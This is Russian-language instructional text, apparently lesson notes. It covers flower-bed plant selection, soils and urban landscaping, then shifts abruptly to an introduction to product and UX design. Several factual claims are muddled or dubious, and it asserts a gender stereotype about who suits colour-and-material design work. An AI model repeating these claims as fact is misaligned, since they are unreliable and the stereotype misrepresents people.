И выбираем стиль: кантри про сельские дома и деревню. Используются простые культуры (гвоздика, рудбеккия). Тут никакой экзотики, редко однолетники и подсолнечники. Упор на плодовые кустарники, такие как смородина, крыжовник, съедобные шиповники, овощные культуры. Другой стиль это лес, в котором используются растения без любви к солнцу: волжанка, колокольчики (красивые только во время цветения, потом некрасивые), нивяники, папортоники, тиарелла, хост. Самый популярный для города стиль это «садовый» — солнечные яркие растения, ирисы, ромашки, лилии, очень много цветков + кустарники роз, спиреи японские, сирени, сашмит. Еще один стиль это луговой — дикорастущие растения для создания природного биоценоза (саморегулирующееся сообщество). Используем злаки и цветущие многолетники. Природный биоценоз требует большой площади, а не дачные 10 соток (100 квадратных метров). Для понимания, бедный биоциоз это сотни растений и живых существ.

Злаковые это маис, пшеница, ячмень, овсянка. Все злаковые являются однодольными растениями, т.е. имеют один лист с семенем. Обычно вытянутые, с длинными тонкими листиками. Обычная трава тоже является злаком. А зерно с колосков это фрукт злаковых растений.

Говоря о городе, мы рассматриваем только открытый грунт с однолетниками, ковровыми растениями, двулетниками, многолетниками и луковичными.

Однолетники очень хорошо себя чувствуют в контейнерах. В отличии от многолетников, которые в контейнерах вымерзают из зи нехватки земли. На данный момент идет тренд на отказ от однолетников, в продаже можно найти только самые красивые. Однолтеникам нужна плодовитая почва, но если растение перекормить, оно начнет наращивать биомассу, что нам не всегда нужно. Для бедной почвы выбираем лаватера и портулак. Другие примеры однолетников: львиный зев, лобелия эринус, агератум Хоустона, они отлично подойдут для ресторанов и парковок. Высаживают их до 15 сентября, чтобы не умерли в течении зимы. Все однолетники любят свет, легкая полутень дает ужасный эффект. Первые заморозки повреждают цветы. Хоть как-то этому сопротивляются годеция, цинерария приморская, львиный зев, могут дотянуть до 0°. Также, при большой влажности почвы такие растения умирают. Учитывая кол-во влаги в Москве, не плохим выбором являются львиный зев, бегонии, бальзамины, китайская гвоздика, алиссум морской могут спасти ситуацию и радовать глаз зрителя. Можно рассмотреть космею, она не требует много земли, и высокая. Чуть менее высоким считается скабиоза, очень в стиле СНГ. Для переднего плана выбираем вербену гибридную, пиретрут, лобелию. При недостатке освещения хорошо себя покажет бальзамин Уоллера. Однолетники (летники) растут в год посева, у нас они не зимуют. В родной стихии эти цветы многолетники, но в СНГ их участь это парадная клумба. Летники цветут все лето, они разные по оттенкам и формам, основа цветников для города. Для частного сада слишком дорогое удовольствие.

Посадка однолетников это рассада. Что такое рассада: сначала растения высаживают в теплицах, потом пикируют (пересаживают в горшки), закаливают рассаду к открытому грунту и пересаживают в грунт после 10 июня. В средней полосы России есть возвратные заморозки в мае, от которых однолетники помирают. Поэтому, высаживая растения на 9 мая, есть шанс гибели растения. Но заказ есть заказ.

Но что же высадить ранней весной? Когда конец апреля и начало мая, и земля прогревается. Можно высаживать маки, космею, василек. Поздняя весна это первая декада мая до 15 мая, мы высаживаем лаватеру, бархатцы отклоненные, циннию, настурцию. И под зиму — львиный зев, скабиоза, их можно закидывать прямо по снегу.

Если заказ подразумевает упор на эстетику, а обычно это так, то выбираем красивоцветвущие: агератум, бегония, бархатцы, петуния, сальвия. У каждого цветка есть много сортов, которые отличаются по цвету и форме. Детали всегда можно найти в справочнике. Если хотим красивую листовую пластину, то это колеос в разных вариациях, цинерария для серого цвета, кохея (листва может быть разного цвета) и классические бегонии.

Можно поиграться с запахом: если у аудитории нет аллергии, то душистый горошек, маттиола ночная (пахнет ночью), резеда, табак (пахнет ночью). Все запахи усиливаются к вечеру, при солнце ароматические растения не проявляют свой запах. Если хотим эстетики даже от высушенных растений, то это кермек, амбербоа, гомфрена, молуцелла — они сохраняют цвет при засыхании. Для гурманов высаживаем съедобные растения — настурция и ноготки. И если эстетика должна быть основана на вьющихся растениях, то душистый горошек, ипомея, фасоль огненно-красная.

Ковер. Ковровые растения не зимуют в открытом грунте. Ковер это низкий цветник с узором/рисунком. Характеризуются большой плотностью посадки, любят солнечные и открытые места, обычно сажают в газон. Растут медленно, хорошо стригутся, очень яркие. Могут быть разных оттенков. Так, холодные оттенки (серые, голубоватые, серебристые) — к таким мы отнесем полынь, клейнию ползучию, гнафалиум, эхеверия, очень рекомендую санталину. Желтые — пиретрум, колеус, бархатцы. Красная — бегония, барбарис (провоцирует ржавчину).

Двулетники — растут за два года, в первый сезон появляется только розетка, а на второй год полноценно расцветают. После второго года жизни растение либо не красивое, либо умирает. Двулетники пересеиваются самостоятельно, но зачастую не передают по наследству свои эстетические качества. Двулетники не сажают большими группами. Они могут цвести в полутени, как пример можно взять маргаритку, виолы, незабудки. Маргаритке нужно осемениться, и она будет постоянно обновляться на газоне. Наперстянка (она ядовитая! и может упасть из-за высокого роста), гвоздика, любимая сердцу с детства шток-роза в СНГ и у англичан. Двулетники высаживаются не рассадой, а посевным способ. Выросли на технической грядке — и весной пересаживаются. Зимой прикрывают лапником, чтобы сдержать снег.

Многолетники — основная группа для работы. Травянистые растения отрастают сами за счет почек. Травянистые растения зимуют без листвы, но есть и исключения: флокс шиловидный, барвинок малый, бадан сердцелистный, ясколка Биберштейна. Они не выходят из зимы сразу декоративными и красивыми, но это первое зеленое пятно после снега, что это не плохо. Многолетниками оформляют цветник непрерывного цветения, такие растения меняют высоту в процессе цветения (дороникум, дельфиниум, мак восточный), но высокорослые растения теряют форму куста. И требуют обрезки. Многие виды не могут долго жить на одном месте, исключение — пионы, волжанка. Глубина обработки почвы не менее 35-50см, ложе цветника нужно заранее готовить, улучшая субстракт. Почва нужна хорошо дренирующая и богатая органикой. Если у нас глинистое основание, то это проблема, цветник не переживет замокание. В идеале, почва состоит из 25% воды, 45% минералов, 25% воздуха и 5% органика. Перебор с водой — получили болото и понижение температуры. Под минералами подразумевается гравий, крупный и мелкий пески, ил и глина. Глина наиболее микроскопическая (0.002 мм), тогда как песок наиболее крупный (до 2 мм).

В болотистой холодной местности формируются глеевые почвы, в которых наблюдается недостаток кислорода. Много воды = мало кислорода. В основном, такая почва пригодна для выращивания травы для скота. Подзолистые почвы отлично подходят хвойным растениям, но для выращивания еды не особо годятся. И бурые лесные почвы, идеальны для выращивания еды.

Немного теории: если земля уже насыщена водой, то новая вода будет впитываться медленнее. Если же насыщения водой нету, то и скорость впитывания воды будет высокой, но после насыщения выйдет на стабильно медленные показатели. Это интуитивно. Но существуют некоторые виды почвы, которые чем суше, тем хуже впитывают воду. В такой почве формируется слой для отталкивания воды, пример это почва после пожара. Аналогично и мертвые растения после засухи, формируют слой почвы, который не впитывает воду должным образом. Также, если растений очень мало, то пористость почвы уменьшается (корни не разрыхляют почву), и воде труднее проникнуть вглубь земли. Скорость проникновения воды в почву считается по уравнение хортона, но оно больше теоретическое.

Вода содержится в почве тремя способами: гравитационно, то есть стекает сверху вниз. Капиллярно, т.е. вода стоит в порах почвы и частично доступна для растений. И гигроскопично, когда вода впитывается в частицы земли и недоступна для растений.

Если покупать дачу, то на участке очень важно проверить, чтобы земля состояла из песка, ила и глины. Такая почва плодородна, особенно если на 25% состоит из воздуха, и еще на 25% заполнена водой. Запах воды позволяет расти растениям, избыток воды должен уходить. Переизбыток воды вредит почве. Есть вода — будет прорастание семян, фотосинтеза и набухания ростков (так они не будут падать). И температура должна быть высокой, это ускоряет рост растений и микробиологическую активность. Избыток воды ведет к охлаждению почвы, потому что воду сложно подогреть. Глина — холодная, песок — теплый. Если мы живем на холме, то будет холоднее: на каждые 100 м над уровнем моря температура может понижаться на 1 градус. Прибрежные районы обычно имеют более песчаную почву.

Немного неожиданная группа растений это декоративные луки, многолетние корневищные растения. Очень трендовые. Их засеивают в открытый грунт семенами, либо сажают луковичку. Очень популярный представитель вида это лук душистый (съедобный до цветения), если хватит сил его не съесть и не дать возможность его сорвать городским жителям, то насладитесь эстетикой его свечения. В городе можно использовать лук гигантский. Все луковичные сажаются поздней осенью, когда температура в почве 10°. Сверху компост, солома, кора, торф, мульчируем. Ближе к концу октября, если видим какой-то грибок на растении, то нужно протравить фунгицидом. Почва для декоративных луков годится почти любая, но не глина и не песок, так как застой воды смертелен. Автор очень любит суглинистую почву, и много страдал с торфяной почвой. Для осени — шафран, крокус это сентябрь/октябрь, безвременник — сентябрь, лук ледебура — начало осени, крокосмия — август. Цикламены очень капризные и на них мы не рассчитываем, растение не нашей полосы.

Луковичные развиваются по однолетнему циклу и дают семена. Как красиво встретить окончание зимы: подснежники в конце марта и середине апреля. Это также луковичное растение. Вместе с ним украшают снег крокус томазини и белолистник весенний. После этого, сразу в начале мая восходят кушкиния, полеска, некоторые виды крокусов. И последним появляется мускари. В оформлении сада первые цветы занимают место между кустарниками и крупными многолетниками. Они теплолюбивые, засаживаются в теплых местах. Только подснежник может жить в полутени, но все равно помрет на второй сезон. А должен жить до 10 лет, если мыши не поедят.

Тюльпаны. Очень популярный цветок, но это необоснованно. Тюльпаны быстро мельчают, поэтому луковицу выкапывают, и хранят в специальных условиях. Это сложно, поэтому тюльпаны мы используем редко. Выбор будет в пользу Дарвиновы гибриды, Грейка, Триумф и ботанические гибриды, но не в пользу тюльпанов. А вот Нарциссы, не смотря на то, что они родом из Азии, вполне адаптировались. Рододендрон цветет сразу после тюльпанов, самые классные это поэтические нарциссы. А одуванчики это вредитель, он создает проплешины на газоне.

Экологиеские группы многолетников.

Гелиофиты это светолюбивые (пшеница, все степные растения, растения высокогорий, луковичные) — могут жить в тени, но почти не вырастут. Типичный гелефит характеризуется сильной корневой системой, жесткими листьями для накопления влаги, блеском (отражают солнце за счет воскового налета), светлый оттенок зеленого.

Теневыносливые (факультативные гелиофиты). Могут расти и в тени, и на солнце. Но слишком яркое солнце их обожгет. Теневые (сциофиты) — растут под пологом леса. Гидрофиты полностью живут в воде, на пересечении воды в сушей. Мезофиты живут на суше и в воде, и ксерофиты любят засуху (суккуленты и склерофиты). Ксерофиты (от др.-греч. ξερός — сухой) живут в пустынях и на склонах, то есть в местах без задержек воды. Что такое степь? Это засушливое лето, холодная зима и богатая почва, и это очень по душе шалфею, ковыль, синеголовнику, гипсофиллу. На скалах почва плохая, и выжить смогут только колосняк, тимьян, ясколка, лаванда. Их нельзя комбинировать с влаголюбивыми растениями. Сухие южные леса характеризуютя средним плодородием, полутенью, и всегда тепло: это оценят барвинок, горянки, иссол. У всех этих растений очень мощные корни для добычи воды, они сохраняют воду, листики толстые и умеют сворачиваться, сами растения довольно низкие и пахнут (лаванда). Если Лаванда не подходит из-за неперенасимости зимы, то можно использовать герань, гипсофилу, иссок лекарственый, колокольчик, котовник (кошачья мята), лиатрис, мак, очиток видный, полынь. При повышении концентрации углекислого газа растения закрывают свои устицы. Если брать за референс реальный лес, то помним, что молодой лес иссушает почву, а не молодой увлажняет почву.

Влаголюбивые растения обычно крупные, яркие, много листвы, очень длинные побеги для отдачи влаги, недостаток влаги легко отследить по желтизне. Умеет защищать пыльцу от влаги, поэтому цветки длинные и очень лиственные. Яркие представители вида: вероника длиннолистная, герань, горец змеиный/изменчивый/мой любимый свечевидный, их достаточно на зиму прикрыть лапником или торфокомпостом. Нельзя обойти вниманием и ирис сибирский (очень классный и синий), кровохлебку, флокс метельчатый. Им нужны хорошо дренированные, плодородные влажные почвы.

Солнечные и умеренно влажные места. Все следующие растения любят очень хорошую почву и обильный полив. Аквилегия, Астра, Ветренница, Буквица, Вероника, Герань, Гейхера, Душица для привлечения насекомых, Лиатрис, Лилейник (умеет зимовать), любимая в Европе для бордюров манжетка, Рудбекия, Флокс растопыренный, Эхинацея.

И если у нас откровенная тень: теневые многолетники имеют свои особенности. Исторически, это лиственные леса, т.е. наличие лиственного опада и подстилки. В хвойных лесах опад дает закисление почвы и очень мало света. Растения для тени небольшие, корневая система очень густая, есть подземные побеги, горизонтально расположенные листья (для получения максимума от солнца), и темно-зеленый цвет листьев. Нет защиты от ультрафиолета. Примеры: бруннера (очень живучая), Вальдштейния, Волжанка (практически универсальное растение), копытень (можно легко найти в лесу), купена, ландыш, медуница, живучка ползучая, медуница, печеносица. Это все относительно мелкие растения, если нужно крупное, то Роджерсия, тиарелла (антропогенное воздействие + тень + изначально неплодородная земля = выживет), хоста, дармера.

Процесс дизайна

Растения размещаются на ближний, средний и дальний планы + учитывается высотная характеристика цветника. Способов компоновки много: цветовые растяжки, геометрическое размещение куртин (немецкие), вытянутые овалы, гравийный отсев. Также, важно учесть сезонность декоративности: весна это с середины мая до середины июня, лето с середины июня до середины августа, осень с середины августа до начала октября. Для непрерывного цветения нужно, чтобы в каждый сезон весь цветник непрерывно цвел. Одно растение завяло — другое воспряло. Если не появились фитофторы или иные паразиты.

Первый шаг: рисуем миксбордер с пояснительной запиской, где расположен цветник, особенности освещения, площадь, цветовой план. Рассчитываем кол-во посадочного материала. В общем, занимаемся планированием и пытаемся уложиться в бюджет.

Процесс реализации: подготовка посадочных мест, высадка растений и содержание цветника. Реализация: сначала готовится территория и ложе цветника. Культивация или замена почвы на 35-40 сантиметров вглубь, используется садовая земля с удобрениями, и привязка габаритов цветков с помощью строительных электродов и бичёвки. И далее выставляются растения в посадочное ложе. Вместо гравия лучше песок. Помним, что у земли есть объем. Нужно слегка подождать, пока земля просядет, и можно высаживать.

Посадка: перед работой цветник обрамляется бордюрной лентой, чтобы газон не посягал на цветник. Бордюр может быть из оцинкованного железа, самое оно для города. Для частных домов сгодится и пластиковая лента, простые камни, плитка, или прокопать лопатой. Это помогает не всегда, хотя сныть своими глубокими корнями все равно заберет ресурсы у цветника.

Уход: полив, рыхление, мульчирование, прополка, подкормка (азот, фосфор, калий, биогумус), обрезка, удаление подорожника, одуванчика, пырей. Самый популярный в интернете совет про прокладывание геотекстиля под газон — вредный, он не пропускает воду. Сорняки все равно выживут, а наши более капризные растения — нет. Лучше использовать солому или хвойный опад. Более вульгарный подход: для дозированной подачи сыпучих материалов используют шнеки (пружины), обычные гибкие шнеки для комбикорма, для домашнего использования больше сгодится серва mg90s.

Учитываем окружение

Перед началом работы важно понять цель проекта, разобраться в контексте. Зона для комфортной жизни бывает транзитная (тротуар вдоль автодороги), пешеходная (места прогулок и отдыха) и жилая (дворы). Если речь про жилые зоны, то необходимы буферные зоны. Они считаются всего лишь элементами благоустройства, хотя имеют и гораздо более практичное применение. Так, деревья, как и любые растения, обогащают воздух кислородом, очищают от вредных примесей и пыли, положительно влияют на температурный режим и влажность. Как пример, за 1 час в спокойном состоянии человек поглощает 19 л. O2 и выделяет 16 л. CO2, одно дерево за 24 часа вырабатывает столько O2, сколько необходимо трем людям для нормальной работы на такой же период времени. Соответственно, 1га зеленых насаждений выделяет 2 кг O2, необходимые для работы двухсот человек в течение всего рабочего дня.

Нужно учитывать инфраструктуру, так, скамейки со спинками и подлокотниками принято располагать в парках и около подъездов, и черные лавочки без спинок и подлокотников возле проезжей части. Такие лавочки не должны стоять на траве, зимой в слякоть комфортно посидеть будет проблематично. Извилистые лавочки провоцируют людей на общение, а значит, нужно и красивое окружение из цветов, а не из крапивы. Где есть лавочка, там должна быть и урна, большая и высокая из текстурированного металла, с отсеком под окурки. Также, дизайнер обязан(а) учитывать тип почвы, ведь для хвойных (елки, сосны) необходима рыхлая почва, с хорошим дренажем с песком, для цветочков (те же розы) нужен чернозем. И так далее, не везде можно рассадить то, что красиво отрендерил визуализатор. Или клумбы, они должны быть высокими, неяркими, и не мешать машинам и пешеходам, и засажены растениями, а не мусором. Ну и всякие мелочи, вроде: заборы это плохо, открытость и свобода передвижения это важные факторы комфортного городского пространства, а уберечь газоты от машин можно столбиками. Заборы допустимы около садиков и детских садов, где дети могут выбросить мячик на проезжую часть и побежать за ним под колеса. И никакой речи быть не может об оцинкованном профлисте или ПО-2. Большие козырьки над светофорами, или очень яркие светодиоды вместо них, продуманные фонарные столбы, ограждения и урны. И чтобы люди/машины не нарушали личное пространство кустарников, установить дорожные катафоты вдоль дороги.

Да и просто, люди любят деревья, это помогает отвлечься от серой урбанистической жизни менеджера по продажам в средненьком банке. Не забывайте их спрашивать по «лестнице соучастия» социолога Шерри Арнштейна.

Расстояния между домами должны быть достаточные, чтобы было чувство личного пространства. Втиснуть одно дерево между двумя окнами, расположенными друг напротив друга — не вариант. Адаптировать город к возрастающему кол-ву новых жителей. Формировать местные сообщества, улучшать доступность городских ресурсов. Держать свалки подальше от аэропортов, чтобы не привлекать стаи птиц. Свалки не должны допускать фильтрацию дождевой воды через тонны мусора напрямую в землю, это убьет экологию фильтратом. Просто залить пластиком или бетоном также не вариант, получится озеро из мусора. Нужна система стоков.

Не забываем про Accessibility. Все видели желтую плитку с рельефом, особенно около светофоров. Это специальная плитка-указатель для людей с нарушением зрения. Она всегда рельефная и бывает двух типов:

• направляющая плитка
• предупреждающая плитка

Направляющая плитка имеет рельефные линии, которые указывают направление с помощью продольных и диагональных направлений. Предупреждающая плитка это выпуклые рифы в форме конуса, которые сигнализируют необходимость остановки движения. В основном, такстильные плитки делают из прессованного бетона, и красят в яркие цвета. Основное преимущество это практичность: надежный материал, дешевый и легкий в монтаже/демонтаже. Но может быть скользким в зимнее время. Для помещений используется керамогранитная плитка. Под помещениями я имею ввиду вокзалы, подземные переходы, ТЦ. Такой плиткой можно указать направление для людей с ограниченными возможностями, так как они тоже хотят потрогать и понюхать растения. Но так как такая плитка яркая, важно учесть цвет и рельеф плитки как элемент дизайна.

Звук. Трамваи это привычный и популярный вид транспорта, но это городской транспорт. И для него очень нежелательно издавать лишние звуки, мешая спать жильцам. Исторически, характерный звук от движения поезда появлялся при проезду по стыку между двумя рельсами. Рельсы делались на заводе и привозились на место сборки, где складывались в ряд, друг за другом, создавая зазор. Также, в местах зазоров со временем происходила деформация, и отсюда покачивание поезда. Но в современном мире этого уже почти нету, многие перешли на термитную сварку.

Пространство позволяет установить автоматическую систему обеззараживания воздуха? Прекрасно. Можно вставить множество USB-зарядок для гаджетов? Делаем. Поручни с «теплым» покрытием по всей площади? Погнали. Можно продавать рядом монстеру, фикус, хлорофирум, калатею, циропегию, таким растениям нужно развиваться и расти, они меняются в ширину и высоту, и живут в земле. Некоторые требуют регулярного опрыскивания, и при ухаживании за большим количеством насаждений будет очень влажно. Земля имеет запах после обработок и пересадок, и большая площадь чревата заболеванием растений. Не забываем про въездные стелы на границе города, их тоже надо украшать.

Все усилия косвенно влияют на одну из ключевых метрик города FDI — Foreign Direct Investment.

Вода, финансы, погода, окружение

Во время работы над дизайном цветника может проявиться множество нюансов. Для начала, нужно удовлетворить базовые запросы на водные ресурсы людей, и лишь потом растений. В год на одного человека необходимо минимум 1700 м³ воды, в той же Канаде запас воды 100 000 тонн на человека в год. Более 10% всей пригодной для употребления воды потребляется людьми за год. Но вода нужна не только жителям. Так, на производство одного килограмма пшеницы уходит тонна воды. Для говядины требуется 16 тонн воды на 1кг. Как мы видим, на обеспечение жизни общества требуется очень много воды, и ее кол-во не изменить: речной сток не сильно меняется из-за увеличения кол-ва осадков. Хоть мы и научились вызывать дожди, но это не сильно помогает. Значит, если на территории города есть проблема с водой, то не всегда лучшая идея отдать водные ресурсы на декоративные клумбы. На большей части территории РФ природные воды сильно загрезнены: на европейской территории много загрязнений. На севере Канады и в Скандинавии такого нет. И нет смысла ставить цветник там, где его никто не увидит. Совет, казалось бы, очевидный, но время от времени появляются гос. заказы на клумбу в заброшенном поселке. Среднее расстояние между объектами в Хабаровском крае – 800 км, в Камчатском крае – 400 км, максимальное – 1950 км (до села Арка) и 1200 км (до поселка Оссора) соответственно. А дорожная инфраструктура развита крайне слабо, до многих объектов отсутствовали подъездные пути, имейте это ввиду. Время от времени пролистываем нормативно-правовую базу и вычитываем особенности территориального планирования.

В РФ больше всего воды в азиатской части страны, там можно разгуляться. Северный морской путь и территории вокруг него в связи с глобальным потеплением могут также стать более актуальными для растений. Как и территория весьма прибыльного Ямало-Ненецкого автономного округа, где располагаются почти все запасы газа и нефти. Наибольшее потепление происходит в высоких широтах, практически в 2,5 раза по сравнению с остальным миром.

Враг декоративных растений это ветер. Комфортная ли природа в РФ? Территория Восточной Европы всегда славилась не самыми комфортными погодными условиями. Сильный ветер становится сильнее по всей территории РФ, кроме Западной Сибири. Такой ветер трудно спрогнозировать, появляется в основном с теплое время суток. Сильный ветер ломает цветонос, да и запустить деревопад. При отсутствии хорошей аэрации, тяжелые металлы также останутся витать на высоте до 100 метров от земли. В северном полушарии ветер обычно с запада на восток, поэтому все загрязнения также летят с запада на восток.

Что входит в зону компетенций продуктового дизайнера — вопрос. В этом уроке постараюсь разложить по полочкам базовые компетенции без учета навыков прототипирования и визуального дизайна.

Продуктовый дизайн это длительный процесс создания и развития одного продукта, который состоит из нескольких проектов. Не просто собрать лендинг, который отдали клиенту и забыли, а углубиться в процесс работы продукта и поведения пользователей. По такому принципу работают дизайнеры в таких компаниях, как Яндекс, Mail.ru, Kaspersky, Google, Samsung, Siemens и так далее.

А теперь сложные слова. Анкетирование, дневниковые исследования, User experience mapping, CJM, usability-testing, интервьюирование, полевое исследование, monadic test, слепое тестирование. Знакомы ли вам эти слова? Это виды исследований и важная часть компетенций продуктового дизайнера. Понимаю, что хочется рисовать, но современный дизайн не про пиксели, а про процессы. 

Терминология

Есть термин UX, а есть Юзабилити (UseAbility). В современном понимании “Юзабилити” целиком и полностью про простоту использования продукта или веб-сайта, понятность интерфейса, и по большей части говорим о диджитал-продуктах. Субдисциплина UX. Это не взаимозаменяемые термины, сейчас важно понимать, что юзабилити вносит весомый вклад в UX, однако, не описывает весь пользовательский опыт. Мы можем измерить удобство использования сайта метриками, такими как SUS, SUM. UX также включает в себя то, как продукт чувствуется. Известный логотип добавляет уверенности в использовании сервиса за счет доверия бренду. Если пользовать заходит на сайт с логотипом Леруа Мерлен, то больше доверяет сайту, чем аналогичному без известного бренда. Возможна и обратная ситуация, в зависимости прошлого опыта покупок в Леруа Мерлен. Или покупая машину под брендом BMW или Ауди, ожидается классный опыт вождения и жизни, а не надежность. За надежность выбирают Toyota и Honda, но никого такими машинами не впечатлить.

Помимо Usability, существует много других субдисциплин UX, таких как Desirability (насколько продукт интересен и приятен), это и есть та самая геймификация/игрофикация, за которыми все гоняются. Adoptability, это насколько продукт легко начать использовать. Этот термин стал популярен не так давно, лишь когда все осознали, что 95% скачиваний мобильных приложений заканчиваются их мгновенным удалением. Findability отвечает за удобство поиска нужной информации. Поисковой системе будет важнее Findability, чем Usability.

Определений у UX много, одно из популярных определений UX дал Джесс Гаретт, с его точки зрения User eXpericene состоит из нескольких слоев, начиная от стратегии и заканчивая уровнем поверхности. Поверхность это готовый продукт, с которым взаимодействует пользователь, тот самый UI.

UX в узком смысле это то, что возникает при наличии трех условий: бизнес, пользователи и технологии. UX это опыт, который получает пользователь во время взаимодействия с компанией, продуктом или услугой. А юзабилити это подзаголовок к UX, более узкий термин, это наука об удобстве взаимодействия с пользовательским интерфейсом.

Зачем исследовать 

Стив Джобс, один из лучших дизайнеров, не мог выдавать одну гениальную идею за другой. Он далеко не с первого раза делал гениальные вещи, только 4-ый iPhone сделал революцию на рынке, первые три были просто классным карманным компьютером и тестом рынка.

Идея номер один: даже самым опытным дизайнерам сложно выдавать отличный результат с первого раза без исследований. Если мы не проверяем наши идеи перед реализацией, значит мы реализуем свои или чьи то галлюцинации. Как проходит рабочий день дизайнера? Обычно дизайнер сидит за макетом часами, днями, и пилит макет, согласовывает, раскидывает кнопки по менюшкам, согласовывает поведение контролов внутри отдела. А конечный пользователь заходит на спроектированный экран, нажимает пару кнопок и уходит, проведя на странице одну минуту. Вспомните, сколько вы рисовали свой первый лендинг? Скорее всего больше дня, а пользователь забежал на выстраданную вами страницу по ссылке из рекламы, прочитал два слова и ушел. И не увидел всех тех идей, хитрых визуальных решений, скрытого функционала, которые дизайнер заложил в макет. Яркий пример: кто знает, как в телеграмме запланировать отправку сообщения?

Чтобы ограничить творческий полет и гарантированно выполнять заказы за хорошие деньги, мы, дизайнеры, прибегаем к помощи некоторых инструментов, которые позволяют делать интерфейс лучше. Объективно лучше, а не просто визуально лучше. И под инструментами я подразумеваю не Photoshop/Illustrator/холст с краской и кисточкой, а именно инструменты как методологии, способы нахождения потребностей, генерации идей для правила полной корзины, и последующее структурирование информации. Запоминаем слово исследования. К нам пришел клиент, сказал что хочет дизайн мобильного приложения. Мы сразу садимся за компьютер и начинаем рисовать? Звучит как начало трагической истории про «все клиенты плохие».

Компетенции

Как бы я рекомендовал вам учиться делать веб-дизайн? Это проектирование сайтов, порталов, сервисов, любые веб-ресурсы. Ответьте себе на вопрос, откуда вы черпаете опыт, как формируете понимание, какими должны быть сайты? Вам очень просто получать опыт, достаточно осознанно пользоваться интернетом. Прямо сейчас вы контактирует с объектом веб-дизайна. Увидели в интернет-магазине какой-то прикольный прием , запомнили и использовали в своих проектах. Увидели, что заказ товара сделан неудобно, запомнили и не делаете так. В мире игр существует понятие деконстракта игр, то есть гейм-дизайнер не просто играет в игру, а понимаем глубинные принципы ее механики. Вот и нам важно не просто пользоваться яндексом гуглом, а анализировать, как и почему сделаны те или иные контролы и блоки сайта.

Дизайн и вообще IT это креативная индустрия, основанная на креативном потенциале людей. Дизайнер продукта это человек, который объединяет в себе несколько ролей в зависимости от потребностей бизнеса. Какие роли в себе можно объединять: 

Промышленный дизайн отвечает за проектирование физических объектов, предметов интерьера. Большинство дизайнеров других специализаций воспринимают промышленных дизайнеров как физиков-ядерщиков. Якобы ребята в мире создания вещей делают нечто крутое, непонятно как и лучше не лезть. Но все не так сложно. Промышленные дизайнеры делают мебель, гаджеты, станки и лампы. И выдают скетчи, модели и прототипы, полагаясь на эргономику, эмпатию и инженерию. Допустим, приемник за авторством Дитора Рамса, который вдохновлял Джонни Айва задать стиль Apple. Дизайн автомобилей это тоже промышленный дизайн, который является квинтэссенцией мастерства в мире промышленного дизайна. Работая над авто, дизайнер может быть как визуальным, думая над эргономикой и визуальной формой, так и инженером. Если посмотреть вакансии в автомобильные компании, то часто в названии вакансии присутствует слово design, но в описании только технические инженерные навыки. Инженер-конструктор. Ближе к визуалу дисциплина cmf design, которая отвечает за цвет, материалы, финиширование. Он же дизайнер Color and Trim/Color and Material (специалист по цвету и материалу). Обычно на этой должности работают девушки, так как более чувствительны к тактильным раздражителям.

Motion-дизайн — визуальная история с анимацией, всякие ролики, мультики, заставки для телеканалов, много 3D-графики. Заставки к фильмам, промо-ролики это тоже motion-deisgn.

3D как отдельная история — проектирование объектов в 3D пространстве, нужно для фильмов, игр графического дизайна, и интерьеры/экстерьеры.

Гейм-дизайн —существуют специальные люди, которые проектируют игры. Результат их работы это дизайн-документ, некая таблица с математикой игрового баланса и описанием механик. Обычно у UX дизайнера и гейм-дизайнера много споров, по крайней мере на моем опыте, всегда приходится сложно дискутировать с гейм-дизайнерами, так как они очень неохотно отдают право на принятие решений, считая себя авторами игры и Кодзимами.

UX/UI-дизайн это основа профессии продуктового дизайнера. В отличии от просто деления на Ui или UX дизайнеров, мы объединяем эти роли в одном человеке, что сразу позволяет частично участвовать в стратегическом развитии продукта. До сих пор существует ассоциация UX с веб-дизайном, но это не так. UX-дизайнер сможет сделать интерфейс для космонавтов и это будет не сайт, как и нативное приложение под редкую операционную систему, с какими-то уникальными подходами для ввода значений. UX-дизайнер всегда должен знать ответ на вопрос Зачем?, а исследователь всегда должен знать ответ на вопрос Почему?. Дизайнер продукта знает ответы на оба вопроса, а еще на вопрос Как?. Мы можем дать определение профессии продуктового дизайнера. Он отвечает не только на вопросы про интерфейс, но и про то, как интерфейс затронет все бизнес-процессы. UX — в целом про пользовательский опыт в контексте любого интерфейса, веб-дизайнер только за веб, ну иногда за мобилочки. Тезис: дизайнер не обязательно человек, который рисует картинки, дизайнеры могут быть вообще не связаны с визуальной частью продукта. Дизайнер должен стремиться получить некий пользовательский опыт от взаимодействия с миром вокруг, переработать его и в улучшенном виде вернуть обратно миру в виде продукта. Продукт не обязательно графический.

UI — как система будет выглядеть и эмоционально чувствоваться. 

UX — как работает система, логика и удобство.

UX и UI дизайн  это две аббревиатуры пользовательского опыта и пользовательского интерфейса. В узком смысле это логика и архитектура происходящего в цифровой среде. Обратимся к Дональду Норману, который основоположник термина UX начиная с 1990. Он ввел термин “пользовательский опыт”, и для него пользовательский опыт это все, что человек ощущает при контакте с чем либо. Взаимодействие с внешним миром позволяет получать разные эмоции и это на нас влияет. Люди готовы переплачивать за позитивный пользовательский опыт, на этом строятся почти все услуги в ценовой категории выше среднего. В хорошем итальянском ресторане со своим производством вина вас будут обслуживать ухоженные люди в дорогой одежде, которые устроят шоу, рассказывая про определенную бутылку вина, пусть даже на итальянском и вы ничего не поймете, но будут учтены все мелочи. Покупая дешевое вино в пакете, и выпивая в полумраке на кухне, человек не получает тот-же опыт. Зато дешевле.

Это называется эмоциональный отклик. На него накладываются культурные отличия: если продукт собой хорош, но не соответствует культурным особенностям определенной нации, значит, они не будут его покупать. Также, существует уровень соответствия социальным ценностям, и соответствия личным предпочтениям. Для начала отношения клиента с продуктом должны совпасть все три пункта. Курс по дизайну это продукт, и если вы начали с ним отношения, то скорее всего он на понятном вам языке, соответствует уровню подготовки, дает некие гарантии. Все совпало, и вы начали пользоваться продуктом.

У человека появились отношения с продуктом, а далее необходимо его удерживать. Для этого используются регулярные приятные удивления. Это позволяет расширить время жизни пользования продуктом на длительный период. За это отвечает одна из основных метрик в бизнесе, LTV. У бизнеса и у продукта могут быть разные и противоречивые метрики. Так, у Facebook монетизация это реклама. Убери рекламу и продуктовые метрики вырастут, аудитория счастлива, нет рекламы. Но бизнес скажет — так, а деньги где? 

Настало время упомянуть три уровня эмоционального дизайна Дона Нормана: каждый уровень влияет на наше восприятие мира.

